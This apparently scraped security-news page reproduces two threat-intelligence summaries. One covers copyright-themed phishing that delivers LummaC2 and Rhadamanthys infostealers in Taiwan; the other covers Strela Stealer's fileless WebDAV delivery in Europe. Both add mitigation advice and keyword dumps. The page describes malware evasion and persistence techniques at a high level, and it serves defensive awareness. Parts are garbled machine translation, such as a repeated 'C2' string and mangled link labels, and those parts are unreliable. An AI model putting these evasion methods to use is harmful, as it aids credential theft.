SOC News: Article

One Article Review

Accueil - L'article:

Source	RiskIQ
Identifiant	8604731
Date de publication	2024-11-01 16:56:15 (vue: 2024-11-01 17:07:24)
Titre	Les acteurs de la menace utilisent le leurre de phishing de violation du droit d'auteur pour déployer des infostèleurs Threat actors use copyright infringement phishing lure to deploy infostealers (Recyclage)
Texte	#### Géolocations ciblées - Taiwan ## Instantané Cisco Talos a récemment identifié une campagne de phishing ciblant les comptes commerciaux et publicitaires de Facebook à Taïwan. ## Description Cette campagne implique des e-mails se faisant passer pour des avis juridiques de sociétés bien connues, revendiquant une violation du droit d'auteur et exigeant des mesures dans les 24 heures.Les e-mails attirent les destinataires dans le téléchargement des logiciels malveillants déguisés en fichiers PDF.L'acteur de menace utilise plusieurs techniques pour échapper à la détection, notamment à abuser des domaines AppSpot.com de Google \\ et Dropbox pour la distribution de logiciels malveillants. Les e-mails de phishing utilisent la langue chinoise traditionnelle, avec des noms de fichiers conçus pour ressembler à des documents juridiques de sociétés reconnaissables, suggérant que l'attaquant a recherché à fond ses objectifs.Lorsque les victimes téléchargent le fichier RAR ci-joint, une archive protégée par mot de passe contient un voleur d'informations, généralement le malware Lummac2 ou Rhadamanthys, qui recueille des données sensibles, y compris les informations d'identification du système, et la transmet à la commande et au contrôle de l'attaquant \\ (C2 (C2 (C2 (C2 (C2 (C2 (C2 (C2 (C2 est de) serveurs. TALOS a observé que Lummac2 fonctionne en cryptant son shellcode, en cachant la charge utile dans la mémoire du système et en utilisant l'API CreateFileMappinga pour échapper à la détection.Rhadamanthys repose également sur l'obscurcissement et l'injection de processus, augmentant les tailles de fichiers pour contourner les analyses antivirus et s'intègre dans les processus système légitimes.Les deux chargeurs de logiciels malveillants manipulent les entrées de registre pour la persistance et utilisent des objets Mutex pour prévenir les infections en double.Cette campagne démontre l'évolution de la sophistication des attaques de phishing ciblant les comptes commerciaux et les méthodes utilisées pour contourner les mesures de sécurité traditionnelles. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encouragez les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https: //learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), qui identifie et bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dan
Notes	★★
Envoyé	Oui
Condensat	### #### © 2024 2024 365 365/security/defender 365/security/office about abusing accessed accounts acquired action actor actors advertising advice: against age all alldevices antivirus any api app apps appspot archive are article attached attachments attack attacker attacks authentication authenticator auto back based block blocks both browser browsers bullet business bypass campaign can card check chinese cisco claiming classes click clicking cloud code collects com com/azure/active com/deployedge/microsoft com/en com/microsoft com/threat command common companies components configure contains content control copyright cover coverage crafted createfilemappinga credential credentials criterion customers data defender delete delivered demanding demonstrates deploy deployment description detection detections/hunting detects devices different directory/authentication/concept directory/authentication/how directory/identity disguised distribution documents domains download downloading dropbox due duplicate edge email emails embedding employees enable enabled encourage encrypting encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure enterprise entire entries equivalent evade even evolving example excluded executable execution facebook features fido file filenames files filtering first following from geolocations google group guidance hello hiding host hour hours https://blog https://learn https://www identified identifies identity impact inbound including increasing infections information infostealer infostealers infostealers/ infringement injection intelligence intrusions involves its itself keys known language learndoc learndoc#block learning legal legitimate like links list loaders locations look lummac2 lure machine mail majority malicious malware malware: managed manipulate many masquerading match measures meet memory methods mfa microsoft mitigation mitigations mode monitored more multiple mutex name=trojan:win32/leonem name=trojan:win32/lummastealer new newly not notices number obfuscated obfuscation objects observed ocid=magicti off offer office operates organizations other overview part password passwordless passwords payload pdf permission persistence personal phishing phones points policies policy polymorphic possible potentially prevalence prevent process processes product prohibited prompt protected protection protection/howto protections pua purge queries ransomware rapidly rar recently recheck recipients recognizable recommendations recommends reduce reduction refer reference references registry relies remind remove reproduction require requires researched reserved response rhadamanthys rights rules running safe scam scans scripts secured security security/defender security/safe security/zero sensitive sent servers settings shellcode should sight similarly site sites sizes smartscreen snapshot sophistication spam specific spoofed status stealer stop stored strictly succeeded suggesting support surface sweeping sync#sync syncing system taiwan talos talosintelligence targeted targeting targets techniques theft thereof thoroughly threat threats times tools traditional transmits trojan:win32/leonem trojan:win32/lummastealer trusted turn typed typically unknown unless unwanted us/wdsi/threats/malware use used users uses using variants vaults victims web websites well when where which windows within without workplace written your “yes”
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

Les reprises de l'article (1):

Source	RiskIQ
Identifiant	8603945
Date de publication	2024-10-30 22:28:21 (vue: 2024-10-30 23:07:27)
Titre	Strela Stealer cible le centre et le sud-ouest de l'Europe grâce à une exécution furtive via webdav Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV (Recyclage)
Texte	#### Targeted Geolocations - Spain - Germany ## Snapshot The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe. ## Description These phishing emails contain ZIP files with obfuscated JavaScript files that, when opened, trigger a PowerShell command to download a malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. This method allows Strela Stealer to bypass detection by not saving files to disk. The malware\'s payload is embedded within a DLL file designed to extract email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, which are then transmitted to the attackers\' command server. Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking locale settings on the infected system. Additionally, it collects system details and file directory data, which allows attackers to perform reconnaissance and possibly conduct follow-up attacks. The malware uses sophisticated evasion techniques, such as JavaScript obfuscation and base64 encoding, making it challenging for security tools to detect. Strela Stealer\'s evolution-from simple phishing with ISO attachments to complex fileless execution-highlights the ongoing advancements in malware distribution tactics, emphasizing the need for robust cybersecurity measures to address such sophisticated threats. ## Microsoft Analysis and Additional OSINT Context Threat actors use WebDAV for distributing information-stealing malware, such as Strela Stealer, because it offers several advantages for evasion, simplicity, and control over payload delivery: - Fileless Execution and Evasion: WebDAV enables fileless malware execution by running malicious payloads directly from remote servers without saving them locally on the target machine. This helps bypass many traditional security defenses that focus on scanning files on disk, as no local file is created. - Direct Remote Access: WebDAV is designed to allow clients to interact with remote servers as though they were local folders. This allows threat actors to distribute payloads seamlessly over HTTP/HTTPS, appearing as legitimate remote connections to the system, which reduces the chances of detection. - Efficient Data Transmission: WebDAV supports real-time access to resources over the network, making it efficient for both distribution and control. Attackers can change payloads or update malicious DLLs on their WebDAV server, ensuring that new or adapted versions of malware are available without having to reinfect machines. - Bypassing Firewalls and Security Filters: Many organizations allow outbound WebDAV traffic through HTTP or HTTPS. This allows attackers to communicate with compromised devices without raising alarms, as this traffic blends in with normal web traffic. - Modular and Scalable Attacks: By using WebDAV, threat actors can scale their operations, as they only need to update files on a centralized server to infect multiple systems, enhancing the malware\'s reach with minimal adjustments on the attacker\'s side. These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible, and scalable methods to deliver information-stealing malware. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t
Notes	★★
Envoyé	Oui
Condensat	### #### © 2024 2024 365 365/security/defender 365/security/office about access access: accessed accounts acquired activity actors adapted additional additionally address adjustments advancements advantages advice: against age alarms all allow allows analysis antivirus any app appearing apps are areas article attachments attack attacker attackers attacks attacks: attractive authentication authenticator authoring auto available base64 based because behind blends block blocks both browser browsers bullet bypass bypassing campaign can card central centralized challenging chances change check checking classes click clicking clients cloud code collects com/azure/active com/blog/strela com/deployedge/microsoft com/en com/microsoft command common communicate complex components compromised conduct configure connections contain content context control copyright cover coverage created credential credentials criterion customers cybersecurity cyble data deceptive defender defenses delete deliver delivered delivery: deployment description designed details detect detection detections/hunting detects devices different direct directly directory directory/authentication/concept directory/authentication/how directory/identity disk distribute distributed distributing distribution distribution/ dll dlls download due edge efficient email emails embedded emmenhtal emphasizing employees enable enabled enables encoding encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced enhancing ensure ensuring enterprise entire equivalent europe evasion evasion: even evolution evolving example excluded executable execution extract features fido file fileless files filtering filters: firewalls first flexible focus folders follow following from geographic geolocations germany group guidance hacktool:win32/autokms having hello helps highlights host hour http http/https https https://blog https://cyble https://learn https://www identified identifiesand identity impact impacting inbound including infect infected infections information infostealer infostealers infrastructure intelligence interact intrusions invoices io/webdav iso its javascript keys labs latest learndoc learndoc#block learning legitimate like links list loader local locale locally locations lure machine machines mail mainly majority make making malicious malware malware: managed many match measures meet method methods mfa microsoft minimal mitigation mitigations mode modular monitored more mozilla msr multiple name=hacktool:win32/autokms name=trojan:js/obfuse name=trojan:js/strelastealer name=trojan:win32/coinminer name=trojan:win32/killav name=trojan:win32/leonem name=trojan:win64/stealer name=trojandropper:js/obfus need network new newly normal not number obfuscated obfuscation ocid=magicti off offer offers office ongoing only opened operations option organizations osint other outbound outlook over overview part password passwordless passwords payload payloads perform permission personal phishing phones points policies policy polymorphic possible possibly potentially powershell prevalence prevent product prohibited prompt protection protection/howto protections pua purge qualities queries raising ransomware rapidly reach real recheck recommendations recommends reconnaissance reduce reduces reduction refer reference references reinfect remind remote remove reproduction require requires research reserved resources response rights robust rules running safe saving scalable scale scam scanning scripts seamlessly secured security security/defender security/safe security/zero seeking sekoia sensitive sent server servers service service: settings several should side sight simple simplicity site sites smartscreen snapshot sophisticated southwestern spain spam specific specifically spoofed status stealer stealing stealthily stealthy stop stored strela strictly succeeded such support supports surface sweeping sync#sync syncing system systems tactics tailors target targeted targets techniques theft them then thereof these though threat threats thro
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

L'article ne semble pas avoir été repris sur un précédent.